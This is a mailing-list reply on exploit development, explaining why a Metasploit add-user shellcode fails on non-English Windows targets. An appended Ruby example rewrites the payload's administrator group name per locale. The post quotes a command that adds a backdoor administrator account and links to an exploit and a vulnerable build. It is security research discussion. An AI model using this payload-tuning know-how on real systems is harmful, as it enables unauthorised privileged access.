Vulnerability Development mailing list archives

Re: Weird shellcode behavior


From: Jerome Athias <jerome.athias () free fr>
Date: Mon, 07 May 2007 08:06:19 +0200

Hi,

gljuposti () gmail com wrote:
> I am building an exploit (heap OF) and I am experiencing different shellcode behavior depending on the parameter I can in no way associate with this problem. For one parameter value the shellcode gets executed correctly, but for the other, there are problems. For example, the calc.exe shellcode creates a calc.exe process (I can see it in task manager), but its window is never displayed.

Exploiting the NaviCOPA HTTP server provides a similar scenario, since there are 2 processes running:
navicpt.exe (behind the shortcut on your desktop ;)
nacicpnt.exe (the targeted process)

Since in the real world you should not just want to run calc on the target, I assume it's ok :-)

> Some other shellcodes like the add user shellcode don't work at all. I use shellcodes from Metasploit.
>
> The shellcode gets called each time and it hasn't been changed in memory, it just doesn't behave like it should.

If you are sure that you correctly found the badchars, the reason could be that your target is not an English one.
If you edit the shellcode's source code (single_adduser.asm), you will see:
db "cmd.exe /c net user metasploit x /ADD && net localgroup Administrators metasploit /ADD"

For an Italian target, for example, you would have to replace "Administrators" with something like "Amministratori".

> Has anyone ever experienced something similar or has any idea why it could happen? This leaves me totally confused.
>
> TIA
References:
https://www.securinfos.info/jerome/navicopa_get_overflow.rb
(dev version)
https://www.securinfos.info/old_softwares_vulnerable/_navicpa_old.exe
(vuln version)

PS: I'm thinking of adding a list of the names of the Administrators group in multiple languages to my MSF eXploit Builder tool, to be able to modify it on the fly based on the chosen locale:
https://www.securinfos.info/metasploit/MSF_XB.php
So I invite people using a non-English Windows platform to send me the Administrators group name with the corresponding locale (language). Thanks in advance ;-)

Hope it helps
/JA
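Added example (not from the thread, from Metasploit or from MSF eXploit Builder) showing the practical consequence of the point Jerome makes above: single_adduser carries its command line as a literal NUL-terminated string after the code bytes, so localising the group name means rewriting that string inside the payload and re-running the badchar check over the result, which is what the per-locale table proposed in the PS would do on the fly. The STUB bytes are a constructed stand-in for the real shellcode (only the layout, code followed by a NUL-terminated command line, is modelled), and the locale table is an illustrative subset: the Italian entry is the one from the thread, the others are given as assumptions to be confirmed against a real install of each locale.

```ruby
# Added example, not code from the thread or from Metasploit. Models the
# single_adduser layout (code bytes, then "cmd.exe ..." followed by a NUL)
# and patches the embedded group name for a non-English target.

# Localised BUILTIN\Administrators names. Assumption: illustrative subset;
# only 'it' comes from the thread, the rest should be verified per locale.
ADMIN_GROUP = {
  'en' => 'Administrators',
  'it' => 'Amministratori',
  'fr' => 'Administrateurs',
  'de' => 'Administratoren',
  'es' => 'Administradores',
}.freeze

# The command line quoted from single_adduser.asm in the thread.
DEFAULT_CMD = 'cmd.exe /c net user metasploit x /ADD && ' \
              'net localgroup Administrators metasploit /ADD'

# Constructed stand-in for the code bytes that precede the string (no NULs,
# as an encoded payload would look). Not real shellcode.
STUB = "\x90\x90\xeb\x10\x5b\x53\xb8\x41\x42\x43\x44\xff\xd0".b.freeze

# Build a payload in the single_adduser layout: code, then the command
# line, then the NUL terminator the shellcode relies on to end the string.
def build_payload(stub, cmd)
  stub.b + cmd.b + "\x00".b
end

# Locate the NUL-terminated command line inside a payload blob.
# Returns [start_offset, command_string], or nil if no "cmd.exe" is present.
def find_command(payload)
  start = payload.index('cmd.exe'.b)
  return nil unless start
  stop = payload.index("\x00".b, start) || payload.bytesize
  [start, payload[start...stop]]
end

# Replace the group name in the embedded command line with the name for
# `locale` and return the new payload. Unknown locales raise instead of
# silently shipping the English name; the payload length may change.
def localize_payload(payload, locale, from: 'Administrators')
  name = ADMIN_GROUP.fetch(locale) { raise ArgumentError, "no group name for locale #{locale}" }
  start, cmd = find_command(payload)
  raise ArgumentError, 'no command line found in payload' unless cmd
  new_cmd = cmd.sub(from.b, name.b)
  raise ArgumentError, "group name #{from} not in command line" if new_cmd == cmd
  payload[0...start].b + new_cmd + payload[(start + cmd.bytesize)..-1].b
end

# Offsets of every byte of `payload` that is in `badchars`, so the check can
# be repeated after localisation. The trailing NUL of the command line always
# shows up here, which is why the adduser payload goes through an encoder.
def badchar_offsets(payload, badchars)
  bad = badchars.b.bytes
  payload.bytes.each_with_index.select { |b, _| bad.include?(b) }.map(&:last)
end

if __FILE__ == $0
  raw = build_payload(STUB, DEFAULT_CMD)
  it  = localize_payload(raw, 'it')
  puts find_command(it)[1]
  puts "bad bytes at: #{badchar_offsets(it, "\x00\x0a\x0d").inspect}"
end
```

Two caveats that follow from the code: the names in the table are ASCII, and a locale whose group name is not representable in ASCII would have to be written in the target's ANSI code page, since cmd.exe receives the line as an ANSI string; and because the patched string is raw payload, the badchar check and the encoder must run on the localised bytes, not on the English payload that was tested first.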

